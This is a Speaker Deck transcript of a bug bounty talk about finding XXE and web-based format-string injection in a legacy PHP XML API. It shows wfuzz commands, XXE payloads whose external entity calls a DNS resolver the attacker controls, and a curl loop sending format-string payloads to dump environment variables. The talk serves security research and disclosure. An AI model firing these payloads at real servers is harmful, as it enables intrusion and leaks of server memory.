Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web based format injection, dumping memory like...
Search
Frans Rosén
September 19, 2018
Research
0
65
Web based format injection, dumping memory like it's 99 (or "Please help")
My lightning talk from Sec-T Stockholm in September 2018.
Frans Rosén
September 19, 2018
Tweet
Share
More Decks by Frans Rosén
See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
fransrosen
0
780
Story of a RCE on Apple through hot jar swapping
fransrosen
0
950
Account hijacking using "dirty dancing" in sign-in OAuth-flows
fransrosen
0
160
A methodology using fuzzing and info disclosure
fransrosen
0
210
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
fransrosen
3
8.7k
A story of the passive aggressive sysadmin of AEM
fransrosen
0
7.9k
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
fransrosen
3
6.6k
Other Decks in Research
See All in Research
Practical The One Person Framework
asonas
1
1.4k
言語処理学会30周年記念事業留学支援交流会@YANS2024:「学生のための短期留学」
a1da4
1
230
Streaming CityJSON datasets
hugoledoux
0
150
いしかわ暮らしセミナー~移住にまつわるお金の話~
matyuda
0
140
ニューラルネットワークの損失地形
joisino
PRO
35
15k
論文紹介/Expectations over Unspoken Alternatives Predict Pragmatic Inferences
chemical_tree
1
250
JMED-LLM: 日本語医療LLM評価データセットの公開
fta98
5
1.1k
Inside Phishing Groups: Trust No One
0x1shu
0
110
データサイエンティストをめぐる環境の違い 2024年版〈一般ビジネスパーソン調査の国際比較〉
datascientistsociety
PRO
0
440
最近のVisual Odometryと Depth Estimation
sgk
1
260
さんかくのテスト.pdf
sankaku0724
0
270
「確率的なオウム」にできること、またそれがなぜできるのかについて
eumesy
PRO
7
3k
Featured
See All Featured
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
32
1.8k
Build your cross-platform service in a week with App Engine
jlugia
229
18k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
246
1.3M
Building Adaptive Systems
keathley
38
2.2k
Designing the Hi-DPI Web
ddemaree
280
34k
How To Stay Up To Date on Web Technology
chriscoyier
788
250k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
126
18k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
159
15k
KATA
mclloyd
29
13k
The Cost Of JavaScript in 2023
addyosmani
45
6.6k
Speed Design
sergeychernyshev
24
570
A better future with KSS
kneath
238
17k
Transcript
@fransrosen Web based format injection, dumping memory like it's 99
or "Please help"
@fransrosen Public Bug Bounty
@fransrosen RCE is 30,000 USD
@fransrosen Methodology • Found a domain not like the other
ones
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available 👍 👍 👍
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen Methodology • Google + GitHub etc • wfuzz! Interesting
path: /cgi-bin/default/
@fransrosen Methodology • Google + GitHub etc • wfuzz! python
wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \ -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/FUZZ
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen Methodology • Google + GitHub etc • wfuzz! /cgi-bin/default/php/
@fransrosen Methodology • Google + GitHub etc • wfuzz! python
wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \ -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/php/FUZZ
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen xml_api?
@fransrosen xml_api?
@fransrosen xml_api? YEAH! 👍
@fransrosen wtf!?
@fransrosen XXE!
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>
<Envelope><Body><exec><transaction>&exl;</transaction> </exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>
<Envelope><Body><exec><transaction>&exl;</transaction> </exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> ???
@fransrosen
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> WOAH.
@fransrosen Format String Injection?
@fransrosen Format String Injection ON ZE WEB?
@fransrosen Format String Injection http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf
@fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM
"%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM
"%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen I can’t handle this shit
@fransrosen Help me, zetatwo
@fransrosen Help me, zetatwo
@fransrosen Help me, zetatwo
@fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY
exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY
exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen Limitations 0x20-0xFF (no 0x22)
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen We can read all ENVs for i in $(seq
8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'
@fransrosen We can read all ENVs for i in $(seq
8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Want to collaborate? @fransrosen
@fransrosen Questions? Suggestions?